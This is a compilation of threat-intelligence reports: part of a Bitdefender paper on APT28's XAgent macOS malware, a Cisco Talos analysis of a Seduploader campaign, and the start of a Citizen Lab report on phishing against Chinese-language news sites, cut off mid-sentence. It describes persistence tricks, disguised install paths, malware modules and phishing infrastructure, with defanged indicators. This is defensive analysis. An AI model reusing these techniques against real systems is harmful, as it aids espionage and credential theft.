0_a70HpSuFQI7FnNetyKM559SUEcCj-WBinNUfTdPQw0ZVTfyNXe26b6isibFp_cJLGqtiOZ9Em3iUA==
Example of Hello Message
[10]
White Paper
E. Modules
All the important functionalities of the XAgent lie in its modules. These modules are used for communication with the C&C server, encryption
and encoding and - most importantly - for data exfiltration and espionage.
1. BootXLoader: is the main module that handles the initialization procedures.
2. MainHandler:
handles C&C commands and controls the other modules based on the commands it receives from the C&C.
case
getInfoOSX
case
getProcessList
case
remoteShell
case
getInstalledAPP
case
showBackupIosFolder
case
downloadFileFromPath
case
createFileInSystem
case
execFile
case
deletFileFromPath
case
takeScreenShot
case
startTakeScreenShot
case
stopTakeScreenShot
case
getFirefoxPassword
case
ftpUpload
case
ftpStop
case
readFiles
3. HTTPChannel : Used for continuous communication with the C&C server, for receiving commands and sending stolen data to the server.
-[HTTPChannel enqueue:array:]
-[HTTPChannel dequeue:]
-[HTTPChannel clear:]
-[HTTPChannel getIntegerFromProcName]
-[HTTPChannel getAgentID]
-[HTTPChannel createRandomSymbols:]
-[HTTPChannel createEncodeToken:size_token:]
-[HTTPChannel createKeyToken:]
-[HTTPChannel random:end:]
-[HTTPChannel generateUrlQuestion:]
-[HTTPChannel generateHttpMes:data_size:size_http_mes:]
-[HTTPChannel createEncodeData:size_data:size_result_data:]
-[HTTPChannel takeOutPacket:::]
-[HTTPChannel generateUrlParametrs:]
-[HTTPChannel isActiveNetwork]
-[HTTPChannel isActiveChannel]
-[HTTPChannel nextServer:]
-[HTTPChannel timeoutChanger:]
-[HTTPChannel get]
-[HTTPChannel getCryptoRawPacket]
-[HTTPChannel postMessageThread]
-[HTTPChannel post]
-[HTTPChannel createCryptPacket]
-[HTTPChannel createDecryptPacket:]
-[HTTPChannel helloMessage]
[11]
White Paper
4. CameraShot: not implemented.
5. Password: used to obtain passwords from Firefox browser profiles. The modules saves them to a file that will be sent to the C&C
servers.
-[Password writeLogMsg:]
-[Password htmlLogMessage:]
-[Password _initNSSLib]
-[Password getFirefoxPassword]
6. FileSystem: used for file management, such as: find file, delete file, execute file, create file.
-[FileSystem getFileFromDirectory:sizeFile:]
-[FileSystem createFile:bodyFile:sizeBody:]
-[FileSystem executeFile:]
-[FileSystem deleteFile:]
-[FileSystem findFilesAtPath:withMask:andRecursion:]
7. FTPManager: used to upload file to the server using credentials received in a previous command from the C&C server.
-[FTPManager buffer]
-[FTPManager init]
-[FTPManager _checkFMServer:]
-[FTPManager fileSizeOf:]
-[FTPManager _createListingArrayFromDirectoryListingData:]
-[FTPManager _uploadData:withFileName:toServer:]
-[FTPManager getAgentID]
-[FTPManager _uploadFile:toServer:]
-[FTPManager _createNewFolder:atServer:]
-[FTPManager _contentsOfServer:]
-[FTPManager _downloadFile:toDirectory:fromServer:]
-[FTPManager uploadData:withFileName:toServer:]
8. InjectApp: Leverages existing higher-level vel interprocess communication mechanisms by sending an kASAppleScriptSuite/
kGetAEUTused event to a process to make it load Apple scripting additions. It then sends another event to inject in to the following Mac
system processes:
mdworker
SystemUIServer
Dock
loginwindow
UserEventAgent
-[InjectApp injectRunningApp]
-[InjectApp isInjectable:]
-[InjectApp sendEventToPid:]
9. InfoOS: Gather information from the infected computer, such as: IOPlatformUUID, process list, operating system version.
10. Keylogger: Records any keystroke from user activity on the system.
-[Keylogger activeAppDidChange:]
-[Keylogger addNotificationForActiveApp]
-[Keylogger checkAccesibility]
-[Keylogger checkSpecialKey:]
-[Keylogger disableLogging]
-[Keylogger enableLogging]
-[Keylogger initEventTapAndStartRunLoop]
-[Keylogger keyPressedeventMonitor]
-[Keylogger pressedKeyWithKeyCode:andModifiers:]
-[Keylogger removeNotificationForActiveApp]
-[Keylogger sendLog]
-[Keylogger setAccessibilityApplication]
[12]
White Paper
-[Keylogger setKeyPressedeventMonitor:]
-[Keylogger start]
-[Keylogger status]
-[Keylogger stop]
11. Launcher: This module is used for generating XAgent
s file path on the infected system and to re-execute itself.
The malware is located in the
/Library/Assistants/.local/
path in a random directory with a name picked from a hardcoded
list. Its filename is also picked from a hardcoded list.
+[Launcher randomInteger:max:]
+[Launcher generateRandomPathAndName]
-[Launcher reloadItSelf:]
-[Launcher checkProcessName]
The malware is located in the
/Library/Assistants/.local/
path in a random directory with a name picked from a
hardcoded list. Its filename is also picked from a hardcoded list.
Posible Directory Path
/Library/Assistants/.local/.localized/
/Library/Assistants/.local/.com.apple.kshd/
/Library/Assistants/.local/.com.apple.erx/
/Library/Assistants/.local/.com.apple.fsg/
/Library/Assistants/.local/.com.apple.ulk/
/Library/Assistants/.local/.com.apple.wsat/
/Library/Assistants/.local/.com.apple.sksh/
/Library/Assistants/.local/.com.apple.ulkg/
/Library/Assistants/.local/.com.apple.updater/
Possible executable name
kshd
skgc
mwwod
rtsol
paxs
mpitil
utyy
exprd
mpiwtil
rtdl
mpil
sync
nfod
wsat
nfsrfd
scpo
launchd
Fres
lanchd
ntfs
update
lauhd
mknod
routr
mnod
route
12. RemoteShell: Used to execute remote commands received from the attacker on the infected machine. It lists installed applications as
well as iPhone backups.
-[RemoteShell dispatchCommand:]
-[RemoteShell start:]
-[RemoteShell executeShellCommand:]
-[RemoteShell getInstalledApps]
-[RemoteShell checkBackupIosDeviceFolder]
[13]
White Paper
13. Coder: Used for base64 encoding/decoding.
Coder::b64Decode(char *,uint,uint *,char *)
Coder::base64UrlEncode(uchar *,uint,uint *)
Coder::b64Encode(uchar *,uint,uint *,char *)
Coder::base64Decode(char *,uint,uint *)
Coder::base64Encode(uchar *,uint,uint *)
14. Cryptor: The cryptographic engine used to encrypt communication with the C&C server.
CryptoContainer::cryptRc4(uchar *,uint,uint)
CryptoContainer::decryptData(uchar *,uint,uint *)
Linux
HTTPChannel
HTTPChannel
MainHandler
AgentKernel
CameraShot
FileObserver
FileSystem
FileSystem
FMServer
FTPManager
InjectApp
Keylogger
Keylogger
Launcher
Password
RemoteShell
RemoteShell
ScreenShot
Coder
Coder
Cryptor
Cryptor
Modules comparison with Linux
[14]
White Paper
F. Conclusions
State-sponsored threat actors go to great lengths to reach their goals. With clear objectives and generous research & development budgets,
APT groups get the job done. It was just a matter of time until the APT28 group realized they were missing out on a serious cyber-weapon
to target Mac OS X users.
The discovery of the XAgent module once again reasserts the need for organizations to tackle computer security in a unified manner,
regardless of the operating system mix they have deployed. Missing out on Macs or mobile phones because they are
inherently secure
gives determined attacks the opportunity they need to subvert individual devices and take over entire networks to exfiltrate information for
months, if not years.
[15]
and reseller partners. Since 2001, Bitdefender has consistently produced award-winning business and consumer security technology, and is a leading security
provider in virtualization and cloud technologies. Through R&D, alliances and partnership teams, Bitdefender has elevated the highest standards of security
excellence in both its number-one-ranked technology and its strategic alliances with the world
s leading virtualization and cloud technology providers. More
information is available at
http://www.bitdefender.com/
All Rights Reserved.
2015 Bitdefender. All trademarks, trade names, and products referenced herein are property of their respective owners.
FOR MORE INFORMATION VISIT: enterprise.bitdefender.com
BD-Business-Feb.21.2017-Tk#: 70585
Bitdefender is a global security technology company that delivers solutions in more than 100 countries through a network of value-added alliances, distributors
and reseller partners. Since 2001, Bitdefender has consistently produced award-winning business and consumer security technology, and is a leading security
provider in virtualization and cloud technologies. Through R&D, alliances and partnership teams, Bitdefender has elevated the highest standards of security
excellence in both its number-one-ranked technology and its strategic alliances with the world
s leading virtualization and cloud technology providers. More
information is available at
http://www.bitdefender.com/
All Rights Reserved.
2015 Bitdefender. All trademarks, trade names, and products referenced herein are property of their respective owners.
FOR MORE INFORMATION VISIT: enterprise.bitdefender.com
BD-Business-Jul.18.2017-Tk#: crea1572
Bitdefender is a global security technology company that delivers solutions in more than 100 countries through a network of value-added alliances, distributors
Cyber Conflict
Decoy Document Used In Real Cyber
Conflict
blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
This post was authored by Warren Mercer, Paul Rascagneres and Vitor Ventura
Update 10/23: CCDCOE released a statement today on their website
Introduction
Cisco Talos discovered a new malicious campaign from the well known actor Group 74 (aka
Tsar Team, Sofacy, APT28, Fancy Bear
). Ironically the decoy document is a deceptive flyer
relating to the Cyber Conflict U.S. conference. CyCon US is a collaborative effort between the
Army Cyber Institute at the United States Military Academy and the NATO Cooperative Cyber
Military Academy and the NATO Cooperative Cyber Defence Centre of Excellence. Due to the
nature of this document, we assume that this campaign targets people with an interest in cyber
security. Unlike previous campaigns from this actor, the flyer does not contain an Office exploit
or a 0-day, it simply contains a malicious Visual Basic for Applications (VBA) macro.
The VBA drops and executes a new variant of Seduploader. This reconnaissance malware has
been used by Group 74 for years and it is composed of 2 files: a dropper and a payload. The
dropper and the payload are quite similar to the previous versions but the author modified
some public information such as MUTEX name, obfuscation keys... We assume that these
modifications were performed to avoid detection based on public IOCs.
The article describes the malicious document and the Seduploader reconnaissance malware,
especially the difference with the previous versions.
Malicious Office Document
Decoy Document
The decoy document is a flyer concerning the Cyber Conflict U.S. conference with the following
filename Conference_on_Cyber_Conflict.doc. It contains 2 pages with the logo of the
organizer and the sponsors:
Due to the nature of the document, we assume that the targeted people are linked or
interested by the cybersecurity landscape. The exact content of the document can be found
online on the conference website. The attackers probably copy/pasted it into Word to create
the malicious document.
The Office document contains a VBA script. Here is the code:
The goal of this code is to get information from the properties of the document ("Subject",
"Company", "Category", "Hyperlink base" and finally "Comments"). Some of this information
can be directly extracted from the Windows explorer by looking at the properties of the file.
The "Hyperlink Base" must be extracted using another tool, strings is capable of obtaining this
by looking for long strings. Pay close attention to the contents of these fields as they appear
base64 encoded.
This extracted information is concatenated together to make a single variable. This variable is
decoded with the base64 algorithm in order to get a Windows library (PE file) which is written
to disk. The file is named netwf.dat. On the next step this file is executed by rundll32.exe via
the KlpSvc export. We see that this file drops 2 additional files: netwf.bat and netwf.dll. The
final part of the VBA script changes the properties of these two files, setting their attributes to
Hidden. We can also see 2 VBA variable names: PathPld, probably for Path Payload, and
PathPldBt, for Path Payload Batch.
Seduploader Variant
Dropper Analysis
As opposed to previous campaigns performed by this actor, this latest version does not
contain privilege escalation and it simply executes the payload and configures persistence
mechanisms. The dropper installs 2 files:
netwf.bat : executes netwf.dll
netwf.dll : the payload
The dropper implements 2 persistence mechanisms:
HKCU\Environment\UserInitMprLogonScript to execute the netwf.bat file
COM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3DC4579291692E}, the CLSID of the class MMDeviceEnumerator.
These 2 techniques have also been previously used by this actor.
Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by
explorer.exe if the COM Object hijack is performed. In this case, explorer.exe will instance the
MMDeviceEnumerator class and will execute the payload.
Payload Analysis
The payload features are similar to the previous versions of Seduploader. We can compare it
to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group
74. Of the 195 functions of the new sample, 149 are strictly identical, 16 match at 90% and 2
match at 80%:
In the previous campaign where adversaries used Office document exploits as an infection
vector, the payload was executed in the Office word process. In this campaign, adversaries did
not use any exploit. Instead,the payload is executed in standalone mode by rundll32.exe.
Adversaries also changed some constants, such as the XOR key used in the previous version.
The key in our version is:
key=b"\x08\x7A\x05\x04\x60\x7c\x3e\x3c\x5d\x0b\x18\x3c\x55\x64"
The MUTEX name is different too: FG00nxojVs4gLBnwKc7HhmdK0h
Here are some of the Seduploader features:
Screenshot capture (with the GDI API);
data/configuration exfiltration;
Execution of code;
File downloading;
The Command & Control (CC) of the analysed sample is myinvestgroup[.]com. During the
investigation, the server did not provide any configuration to the infected machines. Based on
the metadata of the Office documents and the PE files, the attackers had created the file on
Wednesday, the 4th of October. We can see, in Cisco Umbrella, a peak in activities 3 days
later, Saturday the 7th of October:
Conclusion
Analysis of this campaign shows us once more that attackers are creative and use the news to
compromise the targets. This campaign has most likely been created to allow the targeting of
people linked to or interested by cybersecurity, so probably the people who are more sensitive
to cybersecurity threats. In this case, Group 74 did not use an exploit or any 0-day but simply
used scripting language embedded within the Microsoft Office document. Due to this change,
the fundamental compromise mechanism is different as the payload is executed in a
standalone mode. The reasons for this are unknown, but, we could suggest that they did not
want to utilize any exploits to ensure they remained viable for any other operations. Actors will
often not use exploits due to the fact that researchers can find and eventually patch these
which renders the actors weaponized platforms defunct. Additionally the author did some small
updates after publications from the security community, again this is common for actors of this
sophisticated nature, once their campaigns have been exposed they will often try to change
tooling to ensure better avoidance. For example the actor changed the XOR key and the
MUTEX name. We assume that these modifications were performed in order to avoid
detection based on public IOCs.
Coverage
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is
ideally suited to prevent the execution of
the malware used by these threat actors.
CWS or WSA web scanning prevents
access to malicious websites and detects
malware used in these attacks.
Email Security can block malicious emails
sent by threat actors as part of their
campaign.
Network Security appliances such
asNGFW,NGIPS, andMeraki MX can
detect malicious activity associated with
this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security
products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious
domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the
latest rule pack available for purchase on Snort.org.
IOCs
Files
Office Documents:
c4be15f9ccfecf7a463f3b1d4a17e7b4f95de939e057662c3f97b52f7fa3c52f
e5511b22245e26a003923ba476d7c36029939b2d1936e17a9b35b396467179ae
efb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52
Seduploader Dropper:
522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805
Sedupload Payload:
ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18
Networks
myinvestgroup[.]com
Insider Information An intrusion campaign targeting
Chinese language news sites
citizenlab.ca /2017/07/insider-information-an-intrusion-campaign-targeting-chinese-language-news-sites/
7/5/2017
Key Findings
This report reveals a campaign of reconnaissance, phishing, and malware operations that use content and
domains made to mimic Chinese language news websites.
We confirm the news portal China Digital Times was the target of a phishing operation and show how content
and domains were made to mimic four other newsgroups in reconnaissance and malware operations:
Mingjing News, Epoch Times, HK01, and Bowen Press. We cannot confirm if these other groups were
directly targeted. These news websites report on issues sensitive to the government of China and are blocked
in the country. However, this report does not conclusively attribute the campaign to a publicly reported threat
actor or state sponsor.
The malware operation made efforts to evade detection and frustrate analysis. The operation combined
obfuscated, packed executables and custom shellcode with an additional step of using compromised servers
to host the malicious payload. We identify the payload as NetWire, a commodity remote access trojan
typically seen used in cybercrime activities and not commonly observed in Asia.
We connect the infrastructure used in the campaign to previous malware operations targeting a Tibetan radio
station and the Thai government. We also connect one of the code signing certificates we observed to a
campaign targeting gaming companies. It is notable that NetWire was also used as a payload in that
campaign.
Summary
A journalist at China Digital Times (CDT), (an independent Chinese and English language news portal), receives an
email from a source claiming to have a tip on a sensitive story:
I have insider information that is different from what
ve published
. The email includes a link to an article from the news portal. Clicking on the link displays the article
with a pop-up message asking the journalist to enter their username and password in prompt designed to look like a
WordPress login page. What is normally a routine interaction for the journalist has become increasingly threatening.
The tip from the source is actually an attempt to steal the journalist
s WordPress credentials used to manage and
publish content to the news portal.
The rouse used in the phishing email was clever, but it did not work. The journalist was immediately suspicious of
the phishing attempts and shared them with researchers at the Citizen Lab to analyze, which led to the discovery of
a wider campaign targeting Chinese language news sites using various tactics including reconnaissance, phishing,
and malware. The campaign used domains and copied content that masqueraded as Epoch Times, Mingjing
News, HK01, and Bowen Press. It is not clear if these other news groups were directly targeted. These
organizations often report on issues that are politically sensitive to the government of China and their websites are
blocked in the country. Our analysis of the infrastructure used in this campaign reveals connections to previous
malware operations targeting Tibetan journalists and the Thai government. These incidents includes targets that are
generally within the geopolitical interest of the government of China. However, this report does not conclusively
attribute the campaign to a publicly reported threat actor or state sponsor.
There are numerous incidents of journalists and news organizations reporting on China being targeted by digital
1/23
espionage operations. In 2009, as part of the GhostNet investigation, Citizen Lab found that China-based operators
had infiltrated the mail servers of Associated Press offices in London and Hong Kong. Another investigation in 2009,
by Nart Villeneuve and Greg Walton uncovered a targeted malware campaign against China-based journalists
working at Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa. In recent years other major
news organizations, including the The New York Times, the Wall Street Journal, and the Washington Post, have
reported intrusions of their networks and systems by China-based operators. In each incident, the operators were
suspected to be sponsored by the government of China with the motivation of gathering information on Chinarelated reporting that the newspapers were covering.
These historical incidents and the campaign we analyze in this report serve as a general reminder that the media
are targets for digital espionage and, as a result, news organizations and journalists need to reflect on their business
practices and behaviours and adopt a more systematic approach to information security.
This report proceeds in five parts outlined below:
Part 1: Phishing Operation Targeting China Digital Times
This section describes phishing messages sent to China Digital Times and our subsequent investigation into the
tactics and server infrastructure used in the operation.
Part 2: Uncovering a Wider Campaign
This section reveals how the operation against China Digital Times was part of a wider campaign of phishing,
reconnaissance, and malware operations that used domains and content made to mimic four other Chineselanguage news organizations, Epoch Times, Mingjing News, HK01, and Bowen Press.
Part 3: Malware Operation
This section describes a malware operation that used content and domains made to mimic Chinese-language news
organizations HK01 and Bowen Press. The malware operation made efforts to evade detection and frustrate
analysis. The operation combined obfuscated, packed executables and custom shellcode with an additional step of
using compromised servers to host the malicious payload. We identify the payload as NetWire, a commodity remote
access trojan that is not commonly observed in Asia and typically seen used in cybercrime activities.
Part 4: Campaign Connections
This section links infrastructure used in the campaign against Chinese-language news site to previous malware
campaigns targeting a Tibetan radio station and the Thai government. It also shows the same certificate information
used to sign the malware in this campaign was used by other malware operations targeting gaming companies.
Part 5: Discussion and Conclusions
This section summarizes the characteristics of the campaign and how it reflects wider information security
challenges for news organizations and journalists.
Part 1: Phishing Operation Targeting China Digital Times
This section describes a phishing messages sent to China Digital Times and our subsequent investigation into the
tactics and server infrastructure used in the operation.
A Suspicious Tip:
I Have Insider Information
China Digital Times is a multi-language news portal that reports on political issues in China and aggregates Internet
2/23
content that has been censored in the country. It was founded by Xiao Qiang, a Professor at the University of
California, Berkeley who has been engaged in human rights activism since the 1989 Tiananmen Square Massacre.
On February 12, 2017, a CDT staff member received an email from a person claiming to be a UC Berkeley student
with
insider information
on claims made by
(Guo Yungui) on
hacker attacks
against the Chinese language
news site Mingjing News. The characters
(Guo Yungui) appears to be a slight variation of Guo Wengui (
), a Chinese billionaire who has gained notoriety after voicing allegations that high ranking officials in the
Communist Party of China are engaged in corruption. In January 2017 he had an interview with Mingjing News in
which he made further unconfirmed allegations regarding official corruption and abuse. Following this interview, the
editor of Minjing News, claimed
several sites and channels of Mingjing were attacked by vicious groups controlled
by corrupt parties.
The email sent to CDT included a link that directly referenced an IP address rather than a domain name. The staff
member was immediately suspicious and did not click on the link (see below):
Original Email Text
From: papa papa hellomice@mail.com
Date: February 13 2017
Subject:
To: [REDACTED]
hXXp://43.240.14.37/asdasdasadqddd12222111[.]php/article.asp=search.php
English Translation
From: papa papa hellomice@gmail.com
Date: February 13 2017
Subject: I am a student of UC Berkeley. I want to get to know you and I have some
explosive revelations for you
To: [REDACTED]
d like to reveal some detailed insider information on Guo Yungui
s claims that Chinese hackers attacked Mingjing
News website.hXXp://43.240.14.37/asdasdasadqddd12222111[.]php/article.asp=search.php
Three days later, the staff member received another email offering insider information on the Mingjing attacks. This
email included a link that, at first glance, appeared to be the domain of China Digital Times, but with a slight
misspelling. Instead of chinadigitaltimes.net the link sent was chinadagitaltimes[.]net with an added
instead of an
in the word digital. A day after this email was sent, other staff members at CDT received similar
emails with the same link (see below).
Original Email Text
From: sda daaa
Date: February 14 2017
Subject:
To: [REDACTED]
:hXXp://www.chinadagitaltimes[.]net/2016/07/chinese-hackers-blamed-multiple-breaches-fdic/
English Translation
3/23
From: sda daaa
Date: February 14 2017
Subject: hi, I'd like to offer you some insider
information.
To: [REDACTED]
I have the latest information on an
article published by China Daily. It
s about follow-ups on the incident of Chinese hackers and some insider
information on the recent attacks against Mingjing News.
Link to the article.
hXXp://www.chinadagitaltimes[.]net/2016/07/chinese-hackers-blamed-multiple-breaches-fdic/The information
presented in the article is slightly different from the information I know.
The link connects to a web page that mirrors content from the real CDT website displaying an article related to
hacker groups from China (see Figure 1 for comparison of the real and fake content).
Figure 1: Comparison of the real and fake CDT webpages.
Visually, the content is identical. The only substantive difference between the real and fake content is a few lines of
javascript code (see Figure 2).
Figure 2: Snippet of Javascript code in the source of the fake China Digital Times webpage.
The function of this code is to pop a window on the screen that says
[Your login has
expired, please log in again!] (see Figure 3).
4/23
Figure 3: Screenshot of the fake China Digital Times webpage and the popup message displayed.
If the OK button is clicked, the user is forwarded to what appears to be a WordPress login page (see Figure 4).
5/23
Figure 4: Fake WordPress Login page
Credentials entered into this page are sent to the operators. Following entry of credentials, users are forwarded to
the real CDT site. The real CDT website runs on WordPress, and therefore the purpose of this phishing campaign is
to steal credentials to the actual CDT website and gain access. The operators customized a fake domain to host real
content and developed custom phishing pages for stealing the WordPress credentials demonstrating a substantial
level of effort.
Phishing Operation Timeline
Through analysis of the server used to host the phishing pages and the phishing emails sent to CDT we
documented the activities and timeline of the operation, which lasted for approximately 20 days (see Figure 5). The
operation began with the operators scanning the real CDT website for vulnerabilities. Five days later the first
phishing email was sent. The next day the operators registered the domain mimicking the CDT site, set up the fake
site, and sent out phishing emails with links to it. Over the next week further phishing emails were sent to CDT.
Through analysis of log files found on the server we observed what appears to be the operators testing the phishing
page during this period. The last phishing email sent to CDT was on February 20. Eight days later the fake CDT
website was taken down and no further phishing emails were sent.
6/23
Figure 5: Timeline of the phishing operation targeting China Digital Times
Reconnaissance and phishing server
This section provides analysis of the server used for reconnaissance and phishing activities. We find fake domains
and content related to China Digital Times and Mingjing News on this server.
The links sent in the emails to CDT are both on the same IP address: 43[.]240[.]14[.]37, hosted by Cloudie, a
hosting provider based in Hong Kong. The link provided in the first phishing email sent to CDT included the full IP
address of the server.
hXXp://43.240.14.37/asdasdasadqddd12222111[.]php/article.asp=search.php
Four days after the first phishing email was sent to CDT we accessed the content on the page and found it served
content copied from a Mingjing News article about illicit sales of Chinese visas (See Figure 6 for comparison of the
real and fake content).
Figure 6: Comparison of the real and fake Mingjing news site
The fake page did not render correctly and was missing content, which may be due to improper mirroring of the
7/23
content, or possibly because the page relies on external content in a location that changed since the initial copy.
Comparing the legitimate page to the fake page finds no addition of code by the operator on the fake page.
Reconnaissance Server Log Analysis
We investigated the directory of the fake Minjing News page and found the content was
modified on February 14, 2017 and discovered a file
log.txt
. This file is a custom log that captures three
pieces of information from every visitor to the page: IP address, web browser user agent, and time visited (see
Figure 7). There is no malicious content on the page. We suspect that the purpose of this page is to perform
reconnaissance of targets by testing if users will click on the link, and by retrieving IP addresses and user agent
information.
Figure 7: Server directory containing the log.txt file.
The first visit in the log file is on February 2, 2017 from the IP address 45[.]124[.]24[.]39 which is also hosted
on Cloudie. This visit is likely from the operators because it was the first visit and from the same provider on which
the server is hosted. There are also two visits in the logs within seconds of each other, from the IP address
125[.]86[.]123[.]47 (ChinaNet, Chongqing China)
Examining the email headers from the phishing emails reveals two IP addresses, including the same Cloudie IP and
another ChinaNet Chongqing IP (see below):
45[.]124[.]24[.]39 Cloudie HK
141[.]08[.]99[.]155: ChinaNet
Chongqing
We shared these IP addresses with CDT to check if the addresses had visited the real CDT website around the
period of the phishing emails. We found that the Cloudie IP address (45[.]124[.]24[.]39) visited the real CDT
web site 42,000 times on February 8 2017, during a four hour period. The rate of the requests, user agents utilized,
and information requested indicates that these visits were attempts to enumerate HTTP paths on the website to test
for vulnerabilities. This scan occurred less than a week before the operators staged the phishing page sent to CDT.
Phishing Server Log Analysis
8/23
Between February 14 and 28, 2017, a direct visit to the URL hXXp://43[.]240[.]14[.]37 returned a copy of
the CDT homepage (see Figure 8).
Figure 8: Comparison of the real frontpage of CDT (as seen on day the emails were sent) and the fake
webpage
This fake homepage was not included in the emails sent to CDT. The operators potentially included this homepage if
users clicked the link in the email and then viewed the top level URL to ensure they were on the right site (see
below).
Email Link:
chinadagitaltimes[.]net/2016/07/chinese-hackers-blamed-multiple-breaches-fdic
Home page: chinadagitaltimes[.]net
The directory of chinadagitaltimes[.]net/2016/07 shows the content listed on the server and lists the last
modified date of the content as February 15, 2017 (see Figure 9).
Figure 9: An index listing on the phishing server.
We found a file
log.txt
on the fake CDT home page and article web pages. This log file records the IP address,
browser user agent, and timestamp of visitors to the pages. We found an additional log in the URL of the fake
WordPress login page that captures username, password and date to record credentials that are entered.
9/23
The logs only included what we suspect to be fake credentials, which demonstrates the phishing attempts were
unsuccessful. The first entry on February 16, 2017 may be a record of the operator testing the phishing page.
username:1111----password:1111----2017-02-16
09:26:14
On February 28, we again see what appear to be test credentials added.
username:12312----password:1232131----2017-02-28
10:25:33
Phishing Operation Final Stages
On February 20, the CDT staff member who received the original phishing email was sent a follow-up email that
responded to an auto away message from the staff member and reminded the recipient about the link that was sent.
This was the last phishing email sent to CDT (see below):
Original Email Text
From: papa papa hellomice@mail.com
To: [REDACTED]
Date: February 20 2017
Subject: Fwd:
[REDACTED]
:) thx
Sent: February 14 2017
From: [REDACTED]
To: "papa papa"hellomice@mail.com
Subject: Re:
2017-02-13 18:34 GMT-08:00 papa papa hellomice@mail.com
hXXp://43.240.14.37/asdasdasadqddd12222111[.]php/article.asp=search.php
English Translation
From: papa papa hellomice@mail.com
To: [REDACTED]
Date: February 20 2017
Subject: Fwd: I am a student at UC Berkeley. I want to get to know you and I have
some exclusive information to expose. I would like to publish an article. How do I
register and log in? thx
Sent: Tuesday, February 14, 2017 at 1:35 PM
From: [REDACTED]
Subject: Re: I am a student at UC Berkeley. I want to get to know you and I have some exclusive information to
expose.
To:
papa papa
hellomice@mail.com
Thanks for the email. Unfortunately I don
t have time before 20th this month. Please contact me again at the end of
this month. Thank you.2017-02-13 18:34 GMT-08:00 papa papa hellomice@mail.com
I would like to expose some materials to you. It is about the insider information of Guo Yungui
s claim that Chinese
hackers attacked Ming Jing News.
hXXp://43.240.14.37/asdasdasadqddd12222111[.]php/article.asp=search.php
10/23
Later on the same day, the phishing pages and log files were taken offline serving a 404 error if visited. The bare IP
of the server (43[.]240[.]14[.]37) also switched to returning a default CentOS test page. After the site was
taken down on February 28 no additional phishing emails were sent and we observed no other activity.
Analysis of passive DNS records and WHOIS registration information associated with the server infrastructure used
to host the fake CDT page led to the discovery that the phishing operation targeting CDT was part of a wider
campaign.
Part 2: Uncovering a Wider Campaign
This section reveals how the operation against China Digital Times was part of a wider campaign of phishing,
reconnaissance, and malware operations that used domains and content made to mimic four other Chinese
language news organizations.
Infrastructure Connections
After examining the server used to host the fake CDT page and referencing passive DNS records and WHOIS
registration information, we found other fake domains registered by the same entity with copied content from
Chinese-language news sites. Our analysis shows that the operators are using the fake domains for at least three
different purposes: reconnaissance, phishing, and malware. We were only able to collect phishing emails sent to
CDT and cannot confirm if the other media organizations were direct targets or if the fake domains were used to
target other groups. Table 1 provides an overview of groups that the operator attempted to mimic through fake
domains and / or copied content.
Fake Domain
Registered
Organization
China Digital
Times
Site contents
copied
Confirmed
targeting
Purpose
Phishing
Mingjing News
Recon
HK01
Malware
Unknown
Bowen Press
Epoch Times
Unknown
The fake domains are linked by common WHOIS registration information, which shows they were all registered by
the same entity. The WHOIS registration information used to register the fake CDT domain is as follows:
Name: free tibet
Mailing Address: Uniter states, Phoenix Arizona 86303
Phone: +1.2126881188
Email: aobama_5@yahoo.com
We found a series of domains registered with the same information. The majority of these domains are designed to
mimic domains of Chinese-language news sites. We resolved each domain to determine if they are active and which
IP they resolve to (see Table 2).
11/23
Registration
Date
Real Organization
secuerserver[.]com
2015-08-31
GoDaddy (secureserver.com)
Not resolving
bowenpres[.]com
2015-10-07
Bowen Press
(bowenpress.com)
Parked Page (GoDaddy)
bowenpress[.]net
2015-10-07
Bowen Press
(bowenpress.com)
Parked Page (GoDaddy)
bowenpress[.]org
2015-10-07
Bowen Press
(bowenpress.com)
Parked Page (GoDaddy)
bowenpross[.]com
2015-10-07
Bowen Press
(bowenpress.com)
Parked Page (GoDaddy)
datalink[.]one
2016-07-07
Gorillaservers
chinadagitaltimes[.]net 2017-02-14
China Digital Times
(chinadigitaltimes.net)
Cloudie HK
epochatimes[.]com
Epoch Times
(theepochtimes.com)
Cloudie HK
Domain
2017-02-27
Hosting Status (As of
March 15th)
The registration dates show the operators have been registering fake domains that mimic Chinese language news
websites since 2015, when they registered domains made to look like the real domain of news site Bowen Press (
bowenpress[.]com).
We investigated the servers hosting the domains and found the operators use two servers for different purposes:
one for phishing and reconnaissance activities and another to serve malware.
The phishing and reconnaissance server hosted the fake CDT domain, the fake Mingjing page, and a domain made
to look like the legitimate domain of Epoch Times (a multilingual media organization started by Chinese-American
Falun Gong supporters.
On February 26 2017, the operators registered a fake domain mimicking the main Epoch Times domain
(epochtimes[.]com), which adds an additional
after
epoch
( epochatimes[.]com).
Following our discovery of the fake Epoch Times domain we notified the organization and shared indicators of
compromise. Epoch Times found a Cloudie IP (103.200.31[.]164) that sent 24,183 requests during a 12 hour
period on March 8, 2017 to the subscription page of Epoch Times at the URL subscribe.epochtimes.com.
These requests appear to be attempts to enumerate HTTP paths, similar to the requests sent to China Digital Times
on February 8.
Given the timeframe of the registration of the fake Epoch Times domain, we suspect the operators may have moved
from targeting CDT to Epoch Times. The fake Epoch Times domain was hosted on the same server as the fake CDT
and Mingjing pages (43.240.14[.]37). However, we did not find content copied from any Epoch Times websites
on the operator
s infrastructure during the investigation and did not have any phishing emails reported to us. It is
possible that the fake Epoch Times domain is being used for phishing or reconnaissance, but we are unable to
confirm.
In addition to phishing and reconnaissance activities the operators are also engaged in malware operations and
have a dedicated server for this purpose. We discovered the malware server by resolving the domain:
datalink[.]one, and found it hosted NetWire, a commodity remote access trojan, and included bait content and
12/23
domains designed to mimic Chinese-language news organizations HK01 and Bowen Press.
Part 3: Malware Operation
This section describes a malware operation that used content and domains made to mimic Chinese-language news
organizations HK01 and Bowen Press. The malware operation made efforts to evade detection and frustrate
